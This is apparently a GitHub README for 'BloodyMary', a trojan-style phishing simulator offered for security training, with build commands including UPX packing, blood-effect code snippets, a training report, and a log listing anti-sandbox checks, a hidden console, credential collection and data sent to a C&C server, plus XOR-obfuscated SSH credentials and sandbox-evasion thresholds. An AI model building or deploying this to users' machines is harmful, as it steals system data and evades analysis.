BloodyMary 是一款用于培训网络安全专业人员的教育工具(木马病毒或勒索软件),可模拟带有社会工程学元素的真实钓鱼攻击。创建此项目旨在提高人们对网络威胁的认识,并演示运行可疑文件的后果。
⚠️ 警告:本工具仅用于教育目的以及在受控环境中的授权测试。
// Blood drop physics
drops[i].velocityY += drops[i].acceleration;
drops[i].x += drops[i].velocityX;
drops[i].y += drops[i].velocityY;
// Color gradient creation
COLORREF CreateBloodGradient(int baseRed, int variation, int alpha)
# Install dependencies
sudo pacman -S mingw-w64-gcc mingw-w64-binutils mingw-w64-headers mingw-w64-crt upx wine
# Clone repository
git clone https://github.com/toxy4ny/bl00dym4ry.git
cd bl00dym4ry
# Build
make
# or
./build.sh
# Build both versions (32-bit and 64-bit)
make all
# or
./build.sh all
# 64-bit version
x86_64-w64-mingw32-gcc -Os -s -static -DWIN32_LEAN_AND_MEAN \
-ffunction-sections -fdata-sections -fno-ident -fomit-frame-pointer \
-o bl00dym3ry.exe main.c \
-Wl,--gc-sections -Wl,--strip-all -Wl,--build-id=none \
-static-libgcc -static-libstdc++ \
-lwininet -lws2_32 -liphlpapi -luser32 -lkernel32 -lgdi32 \
-lshell32 -ladvapi32 -lole32 -loleaut32 -luuid -lmsimg32
# Size optimization
x86_64-w64-mingw32-strip --strip-all bl00dym3ry.exe
upx --best --lzma bl00dym3ry.exe
SECURITY_TRAINING_REPORT.txt===============================================================
CYBERSECURITY TRAINING REPORT
===============================================================
WARNING: This is the result of a phishing training test
YOU SUCCESSFULLY LAUNCHED A SUSPICIOUS FILE!
What happened:
+ System information was collected
+ Data was sent to external server
+ Visual effects were demonstrated
+ Malicious activity was simulated
RECOMMENDATIONS:
1. Don't open suspicious attachments
2. Verify email senders
3. Use antivirus software
4. Regularly update software
5. Be careful with links
// File does NOT cause real harm:
// - Does not encrypt files
// - Does not install backdoors
// - Does not modify system settings
// - Creates only educational report
[✓] Anti-sandbox checks passed
[✓] Console window hidden
[✓] Process started successfully
[✓] System information collected
[✓] Network configuration analyzed
[✓] Process enumeration completed
[✓] User credentials identified
[✓] Data packaged for transmission
[✓] TCP connection established
[✓] Information sent to C&C server
[✓] Connection terminated
[✓] Screen effects activated
[✓] Horror elements displayed
[✓] Victim awareness achieved
[✓] Educational message delivered
// Change obfuscated SSH settings
static char ssh_host[] = {0x73, 0x7f, 0x7f, 0x3a, 0x66, 0x6d, 0x63, 0x3a, 0x66, 0x3a, 0x66, 0x72, 0x72, 0x00};
static char ssh_user[] = {0x05, 0x16, 0x17, 0x03, 0x16, 0x02, 0x03, 0x00};
static char ssh_pass[] = {0x08, 0x34, 0x09, 0x16, 0x01, 0x02, 0x16, 0x08, 0x67, 0x65, 0x67, 0x69, 0x00};
// Blood intensity configuration
#define BLOOD_DROPS_COUNT 80
#define BLOOD_SPLATTERS_COUNT 150
#define BLOOD_TRAILS_COUNT 300
#define ANIMATION_FRAMES 500
// Check configuration
#define MIN_SLEEP_TIME 2800
#define MIN_PROCESS_COUNT 25
#define MIN_RAM_SIZE (1024 * 1024 * 1024)
如果你发现了 Bug 或问题:
本项目基于 MIT 许可证分发。详情请参阅 LICENSE 文件。
MIT License
Copyright (c) 2025 Hackteam.Red
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
重要提示:本项目仅用于教育目的和授权安全测试。作者不对本软件的不当使用负责。
在未经系统所有者明确许可的情况下使用本工具攻击系统属于违法行为,可能导致刑事责任。
感谢所有项目贡献者和网络安全社区为创造一个更安全的数字世界所做的贡献! 特别感谢 00 年代初屏幕上血液效果的创意,那时我们曾在 IRC 频道上与昵称为 "DES/29A" 的病毒制作者讨论病毒视觉效果。
██████╗ ██╗ ██████╗ ██████╗ ██████╗ ███╗ ███╗ █████╗ ██████╗ ██╗ ██╗
██╔══██╗██║ ██╔═══██╗██╔═══██╗██╔══██╗████╗ ████║██╔══██╗██╔══██╗╚██╗ ██╔╝
██████╔╝██║ ██║ ██║██║ ██║██║ ██║██╔████╔██║███████║██████╔╝ ╚████╔╝
██╔══██╗██║ ██║ ██║██║ ██║██║ ██║██║╚██╔╝██║██╔══██║██╔══██╗ ╚██╔╝
██████╔╝███████╗╚██████╔╝╚██████╔╝██████╔╝██║ ╚═╝ ██║██║ ██║██║ ██║ ██║
╚═════╝ ╚══════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝
🎭 Trojan Phishing Simulator for Cybersecurity Training 🎭
版本:1.0.0 | 最后更新:2025